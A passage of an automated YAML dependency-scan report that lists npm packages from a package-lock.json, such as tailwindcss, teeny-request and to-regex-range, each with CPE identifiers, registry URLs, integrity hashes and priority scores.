- cpe: cpe:2.3:a:svg-arc-to-cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg-arc-to-cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg_arc_to_cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg_arc_to_cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg-arc-to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg-arc-to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg_arc_to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg_arc_to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg-arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg-arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg_arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg_arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:svg:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/svg-arc-to-cubic-bezier@3.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/svg-arc-to-cubic-bezier/-/svg-arc-to-cubic-bezier-3.2.0.tgz
|
|
integrity: sha512-djbJ/vZKZO+gPoSDThGNpKDO+o+bAeA4XQKovvkNCqnIS2t+S4qnLAGQhyyrulhCFRl1WWzAp0wUDV8PpTVU3g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0702fc96b298768b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: tailwindcss 3.4.19'
|
|
title: tailwindcss 3.4.19
|
|
description: 'Package discovered: tailwindcss 3.4.19'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4180007fa4dbcaa3
|
|
name: tailwindcss
|
|
version: 3.4.19
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:tailwindcss:tailwindcss:3.4.19:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/tailwindcss@3.4.19
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.4.19.tgz
|
|
integrity: sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ==
|
|
dependencies:
|
|
'@alloc/quick-lru': ^5.2.0
|
|
arg: ^5.0.2
|
|
chokidar: ^3.6.0
|
|
didyoumean: ^1.2.2
|
|
dlv: ^1.1.3
|
|
fast-glob: ^3.3.2
|
|
glob-parent: ^6.0.2
|
|
is-glob: ^4.0.3
|
|
jiti: ^1.21.7
|
|
lilconfig: ^3.1.3
|
|
micromatch: ^4.0.8
|
|
normalize-path: ^3.0.0
|
|
object-hash: ^3.0.0
|
|
picocolors: ^1.1.1
|
|
postcss: ^8.4.47
|
|
postcss-import: ^15.1.0
|
|
postcss-js: ^4.0.1
|
|
postcss-load-config: ^4.0.2 || ^5.0 || ^6.0
|
|
postcss-nested: ^6.2.0
|
|
postcss-selector-parser: ^6.1.2
|
|
resolve: ^1.22.8
|
|
sucrase: ^3.35.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1167979aa3e3af06
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: teeny-request 9.0.0'
|
|
title: teeny-request 9.0.0
|
|
description: 'Package discovered: teeny-request 9.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5100f72eed8a2178
|
|
name: teeny-request
|
|
version: 9.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:teeny-request:teeny-request:9.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:teeny-request:teeny_request:9.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:teeny_request:teeny-request:9.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:teeny_request:teeny_request:9.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:teeny:teeny-request:9.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:teeny:teeny_request:9.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/teeny-request@9.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz
|
|
integrity: sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==
|
|
dependencies:
|
|
http-proxy-agent: ^5.0.0
|
|
https-proxy-agent: ^5.0.0
|
|
node-fetch: ^2.6.9
|
|
stream-events: ^1.0.5
|
|
uuid: ^9.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b4e9549620686503
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: thenify 3.3.1'
|
|
title: thenify 3.3.1
|
|
description: 'Package discovered: thenify 3.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9fd87e687c3b74ca
|
|
name: thenify
|
|
version: 3.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:thenify:thenify:3.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/thenify@3.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/thenify/-/thenify-3.3.1.tgz
|
|
integrity: sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw==
|
|
dependencies:
|
|
any-promise: ^1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a439c679c65c98cd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: thenify-all 1.6.0'
|
|
title: thenify-all 1.6.0
|
|
description: 'Package discovered: thenify-all 1.6.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 845b1699e3aa7533
|
|
name: thenify-all
|
|
version: 1.6.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:thenify-all:thenify-all:1.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thenify-all:thenify_all:1.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thenify_all:thenify-all:1.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thenify_all:thenify_all:1.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thenify:thenify-all:1.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thenify:thenify_all:1.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/thenify-all@1.6.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/thenify-all/-/thenify-all-1.6.0.tgz
|
|
integrity: sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA==
|
|
dependencies:
|
|
thenify: '>= 3.1.0 < 4'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e5c0090ac7c6baa4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: thirty-two 1.0.2'
|
|
title: thirty-two 1.0.2
|
|
description: 'Package discovered: thirty-two 1.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f3444a348db654fb
|
|
name: thirty-two
|
|
version: 1.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:thirty-two:thirty-two:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thirty-two:thirty_two:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thirty_two:thirty-two:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thirty_two:thirty_two:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thirty:thirty-two:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:thirty:thirty_two:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/thirty-two@1.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz
|
|
integrity: sha512-OEI0IWCe+Dw46019YLl6V10Us5bi574EvlJEOcAkB29IzQ/mYD1A6RyNHLjZPiHCmuodxvgF6U+vZO1L15lxVA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ed31df7df590fd3e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: tiny-inflate 1.0.3'
|
|
title: tiny-inflate 1.0.3
|
|
description: 'Package discovered: tiny-inflate 1.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8a9f89a30def4776
|
|
name: tiny-inflate
|
|
version: 1.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:tiny-inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny-inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny_inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny_inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny:tiny-inflate:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny:tiny_inflate:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/tiny-inflate@1.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz
|
|
integrity: sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 99c39b0d16665208
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: tiny-invariant 1.3.3'
|
|
title: tiny-invariant 1.3.3
|
|
description: 'Package discovered: tiny-invariant 1.3.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 509a74e9f8ec9c11
|
|
name: tiny-invariant
|
|
version: 1.3.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:tiny-invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny-invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny_invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny_invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny:tiny-invariant:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:tiny:tiny_invariant:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/tiny-invariant@1.3.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz
|
|
integrity: sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e99ae3502724aa2b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: tinyglobby 0.2.16'
|
|
title: tinyglobby 0.2.16
|
|
description: 'Package discovered: tinyglobby 0.2.16'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ea1b10e091012c4d
|
|
name: tinyglobby
|
|
version: 0.2.16
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:tinyglobby:tinyglobby:0.2.16:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/tinyglobby@0.2.16
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz
|
|
integrity: sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg==
|
|
dependencies:
|
|
fdir: ^6.5.0
|
|
picomatch: ^4.0.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 098e9c86e46e996b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: to-regex-range 5.0.1'
|
|
title: to-regex-range 5.0.1
|
|
description: 'Package discovered: to-regex-range 5.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 32aacf96124c437a
|
|
name: to-regex-range
|
|
version: 5.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:to-regex-range:to-regex-range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to-regex-range:to_regex_range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to_regex_range:to-regex-range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to_regex_range:to_regex_range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to-regex:to-regex-range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to-regex:to_regex_range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to_regex:to-regex-range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to_regex:to_regex_range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to:to-regex-range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:to:to_regex_range:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/to-regex-range@5.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz
|
|
integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==
|
|
dependencies:
|
|
is-number: ^7.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: eba377c5cfb24e56
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: toidentifier 1.0.1'
|
|
title: toidentifier 1.0.1
|
|
description: 'Package discovered: toidentifier 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ce376bb248c7ffa1
|
|
name: toidentifier
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:toidentifier:toidentifier:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/toidentifier@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz
|
|
integrity: sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 332c86a1be157c00
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: tr46 0.0.3'
|
|
title: tr46 0.0.3
|
|
description: 'Package discovered: tr46 0.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 44b5fbfc3cffc498
|
|
name: tr46
|
|
